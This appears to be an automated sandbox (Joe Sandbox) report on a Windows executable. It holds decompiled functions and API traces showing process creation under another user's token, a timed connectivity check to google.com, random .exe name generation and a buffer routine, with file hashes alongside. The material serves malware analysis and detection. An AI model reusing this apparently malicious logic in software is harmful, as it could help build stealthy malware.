            0x0040506c
            0x00405072
            0x00405088
            0x0040508e
            0x00405096
            0x00405096
            0x0040509b
            0x0040509d
            0x0040509d
            0x00000000
            0x004050ab
            0x004050ad

            APIs
              • Part of subcall function 00413971: GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,00000000,?,?,00411A4E,?,?,?,00403B10,000000FF,0041A2A0), ref: 0041398A
              • Part of subcall function 00413971: GetLastError.KERNEL32(?,00000000,?,?,00411A4E,?,?,?,00403B10,000000FF,0041A2A0,00000000,?,00000000), ref: 00413990
              • Part of subcall function 00413971: GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,00000000,?,?,00411A4E,?,?,?,00403B10,000000FF,0041A2A0), ref: 004139BA
            • EqualSid.ADVAPI32(00000000,?,?,004051B9,?,00405199,004051B9,?,00000001,?,0040460E,00000001,?), ref: 00405064
              • Part of subcall function 00411D38: LoadLibraryA.KERNEL32(userenv.dll,00000001), ref: 00411D49
              • Part of subcall function 00411D38: GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 00411D68
              • Part of subcall function 00411D38: GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 00411D74
              • Part of subcall function 00411D38: CreateProcessAsUserW.ADVAPI32(?,00000000,00405093,00000000,00000000,00000000,00405093,00405093,00000000,?,?,?,00000000,00000044), ref: 00411DE5
              • Part of subcall function 00411D38: CloseHandle.KERNEL32(?), ref: 00411DF8
              • Part of subcall function 00411D38: CloseHandle.KERNEL32(?), ref: 00411DFD
              • Part of subcall function 00411D38: FreeLibrary.KERNEL32(?), ref: 00411E14
              • Part of subcall function 00410418: HeapFree.KERNEL32(00000000,00000000,00411C0D,00000000,?,?,?,?,0040373A,00000000,00403AF4), ref: 0041042B
            • CloseHandle.KERNEL32(?,?,004051B9,?,00405199,004051B9,?,00000001,?,0040460E,00000001,?), ref: 004050A5
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CloseHandle$AddressFreeInformationLibraryProcToken$CreateEqualErrorHeapLastLoadProcessUser
            • String ID: "%s"
            • API String ID: 4035272744-3297466227
            • Opcode ID: 8f56f32f9d776c86d182f73d6dac292417ea535fa9fb18d101ac2859fdccc457
            • Instruction ID: de1327ba5f535dbe86a1987ce78f5487b0f32bd7d059fc8aa046bd08f94f7674
            • Opcode Fuzzy Hash: 8f56f32f9d776c86d182f73d6dac292417ea535fa9fb18d101ac2859fdccc457
            • Instruction Fuzzy Hash: 4CF01D35100109BBDF116F62EC45DDF3F69EF44765B048036FE08A5161DB39DAA09BA8
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0041234E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E0041234E(intOrPtr __eax, void* __eflags) {
				long _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char* _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v55;
				char _v56;
				void* __edi;
				intOrPtr _t27;

				_t27 = 0;
				_v56 = 1;
				_v55 = 1;
				_v52 = 0;
				_v48 = __eax;
				_v44 = E004122CD();
				_v40 = "http://www.google.com/webhp";
				_v36 = 0;
				_v32 = 0;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0x80000;
				_v12 = 0;
				_v8 = GetTickCount();
				if(E0041219B( &_v56, 0) != 0) {
					_t27 = GetTickCount() - _v8;
				}
				E00410418(_v44);
				return _t27;
			}



















            0x00412356
            0x00412359
            0x0041235d
            0x00412361
            0x00412364
            0x00412372
            0x00412375
            0x0041237c
            0x0041237f
            0x00412382
            0x00412385
            0x00412388
            0x0041238b
            0x00412392
            0x0041239b
            0x004123a5
            0x004123ab
            0x004123ab
            0x004123b1
            0x004123bc

            APIs
              • Part of subcall function 004122CD: LoadLibraryA.KERNEL32(urlmon.dll,00000000), ref: 004122DE
              • Part of subcall function 004122CD: GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 004122F1
              • Part of subcall function 004122CD: FreeLibrary.KERNEL32(?), ref: 00412343
            • GetTickCount.KERNEL32 ref: 00412395
              • Part of subcall function 0041219B: WaitForSingleObject.KERNEL32(?,?,?,?,00000000), ref: 004121EF
              • Part of subcall function 0041219B: InternetCloseHandle.WININET(00000000), ref: 00412288
            • GetTickCount.KERNEL32 ref: 004123A7
            Strings
            • http://www.google.com/webhp, xrefs: 00412375
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CountLibraryTick$AddressCloseFreeHandleInternetLoadObjectProcSingleWait
            • String ID: http://www.google.com/webhp
            • API String ID: 2673491915-2670330958
            • Opcode ID: 34f626b8b5391ffe4678d737750fe3096cc0766a801a2eedb9d2969d0c33afec
            • Instruction ID: b7d87d393a00f6d3ff7478f70dd80c538920e7b4efe6c92315f4941bdff8a685
            • Opcode Fuzzy Hash: 34f626b8b5391ffe4678d737750fe3096cc0766a801a2eedb9d2969d0c33afec
            • Instruction Fuzzy Hash: EA01C8B1C11228AACF00EFE9DA445CDFBB8AF08758F10416BE910B7251D3B95A458BE9
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0041484C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E0041484C(intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, WCHAR* _a16, char _a20) {
				char _v524;
				void* _t21;

				_t21 = 0;
				while(1) {
					_t3 =  &_a20; // 0x405a51
					E0041471A( *_t3, 4, 0, _a4,  &_v524);
					if(E00415D45( &_v524, _a12, _a8) != 0 && (_a16 == 0 || PathAddExtensionW(_a12, _a16) != 0) && GetFileAttributesW(_a12) == 0xffffffff) {
						break;
					}
					_t21 = _t21 + 1;
					if(_t21 < 0x64) {
						continue;
					}
					return 0;
				}
				return 1;
			}





            0x00414856
            0x00414858
            0x00414862
            0x00414867
            0x0041487f
            0x00000000
            0x00000000
            0x004148a5
            0x004148a9
            0x00000000
            0x00000000
            0x00000000
            0x004148ab
            0x00000000

            APIs
              • Part of subcall function 0041471A: CharUpperW.USER32(00000000,?,.exe,00000000,00000000), ref: 0041483C
              • Part of subcall function 00415D45: PathCombineW.SHLWAPI(?,?,004014A8,004038F5,?,?,?,00000000), ref: 00415D65
            • PathAddExtensionW.SHLWAPI(?,00000000,?,?,?,?,00000000), ref: 0041488D
            • GetFileAttributesW.KERNEL32(?,?,?,?,?,00000000), ref: 0041489A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Path$AttributesCharCombineExtensionFileUpper
            • String ID: QZ@
            • API String ID: 1608718705-2763483611
            • Opcode ID: f864a30776303c99050a321279a0f582713915ca6dac1713dd78a05a14e223e4
            • Instruction ID: 2f13b75feab0b7af197fae2ac6940f87bfe199e0202b6e71fbc43ecf614aa425
            • Opcode Fuzzy Hash: f864a30776303c99050a321279a0f582713915ca6dac1713dd78a05a14e223e4
            • Instruction Fuzzy Hash: 8AF0AF390002999BDF117F20DC08ADB3BA9AF41314F100162BC75A11B1C739C9E5DBA8
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0041586F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
            Download Yara Rule
            APIs
            • GetFileSizeEx.KERNEL32(pcA,pcA,?,?,?,00416370,00000000), ref: 0041587B
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: FileSize
            • String ID: pcA$pcA
            • API String ID: 3433856609-2925337091
            • Opcode ID: 6ba33f325e9202a96636ff95ee68f34ae1b4b1d87b92ee624ec7db9df8b6777e
            • Instruction ID: 6343ac0d896cac72530366b4ca8b2af1a14618cd811eec335676e342a510c66f
            • Opcode Fuzzy Hash: 6ba33f325e9202a96636ff95ee68f34ae1b4b1d87b92ee624ec7db9df8b6777e
            • Instruction Fuzzy Hash: D2D05E71600108FBDB08DF99CC41CDE7BBDDB84360B148221B52296290D370EE919664
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0040B9DA Relevance: 5.1, APIs: 4, Instructions: 72COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E0040B9DA(intOrPtr _a4) {
				intOrPtr _v8;
				void* __esi;
				void* _t13;
				signed int _t19;
				signed int _t22;
				signed short _t27;
				signed int _t31;
				void* _t38;

				_t38 = E00411098(_a4);
				if(_t38 > 0x3e8) {
					EnterCriticalSection(0x41aa48);
					E00410418( *0x41aa3c);
					 *0x41aa3c =  *0x41aa3c & 0x00000000;
					 *0x41aa44 = 0;
					LeaveCriticalSection(0x41aa48);
					return 0;
				}
				EnterCriticalSection(0x41aa48);
				_t27 = ( *0x41aa44 & 0x0000ffff) + _t38;
				if(_t27 <= 0x3e8) {
					_t13 = E004103A8(_t27 + _t27, 0x41aa3c);
					if(_t13 != 0) {
						_t31 =  *0x41aa3c; // 0x0
						_t13 = E00410454(_t31 + ( *0x41aa44 & 0x0000ffff) * 2, _a4, _t38 + _t38);
						 *0x41aa44 = _t27;
					}
				} else {
					_t13 = E004103A8(0x7d0, 0x41aa3c);
					if(_t13 != 0) {
						_t18 = 0x3e8 - _t38;
						_t19 =  *0x41aa3c; // 0x0
						E00410454(_t19, _t19 + (( *0x41aa44 & 0x0000ffff) - 0x3e8 - _t38) * 2, 0x3e8 - _t38 + _t18);
						_t22 =  *0x41aa3c; // 0x0
						_t13 = E00410454(0x3e8 - _t38 + _t18 + _t22, _v8, _t38 + _t38);
						 *0x41aa44 = 0x3e8;
					}
				}
				LeaveCriticalSection(0x41aa48);
				return _t13;
			}











            0x0040b9e6
            0x0040b9ef
            0x0040b9f7
            0x0040ba03
            0x0040ba08
            0x0040ba12
            0x0040ba18
            0x00000000
            0x0040ba18
            0x0040ba29
            0x0040ba36
            0x0040ba3f
            0x0040ba90
            0x0040ba97
            0x0040ba99
            0x0040bab2
            0x0040bab7
            0x0040bab7
            0x0040ba41
            0x0040ba46
            0x0040ba4d
            0x0040ba58
            0x0040ba5f
            0x0040ba6a
            0x0040ba73
            0x0040ba7f
            0x0040ba84
            0x0040ba84
            0x0040ba4d
            0x0040bac3
            0x00000000

            APIs
            • EnterCriticalSection.KERNEL32(0041AA48,?,?,?,0040BCD5,?), ref: 0040B9F7
              • Part of subcall function 00410418: HeapFree.KERNEL32(00000000,00000000,00411C0D,00000000,?,?,?,?,0040373A,00000000,00403AF4), ref: 0041042B
            • LeaveCriticalSection.KERNEL32(0041AA48,?,?,?,0040BCD5,?), ref: 0040BA18
            • EnterCriticalSection.KERNEL32(0041AA48,?,?,?,?,0040BCD5,?), ref: 0040BA29
            • LeaveCriticalSection.KERNEL32(0041AA48,?,?,?,0040BCD5,?), ref: 0040BAC3
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CriticalSection$EnterLeave$FreeHeap
            • String ID:
            • API String ID: 1946732658-0
            • Opcode ID: 88fcec2881c9d694ad576b08e08077100b77a3ba60a83f58d9bdb58bf3aed55e
            • Instruction ID: 58294bfac58941e6c5e768dd41daeb90d1b738a76378483031a66887db6d87b7
            • Opcode Fuzzy Hash: 88fcec2881c9d694ad576b08e08077100b77a3ba60a83f58d9bdb58bf3aed55e
            • Instruction Fuzzy Hash: 7D2186316011049BC711EF95EF859F93768EF84389704807FF50597662DB7C58A8CB9E
            Uniqueness

            Uniqueness Score: -1.00%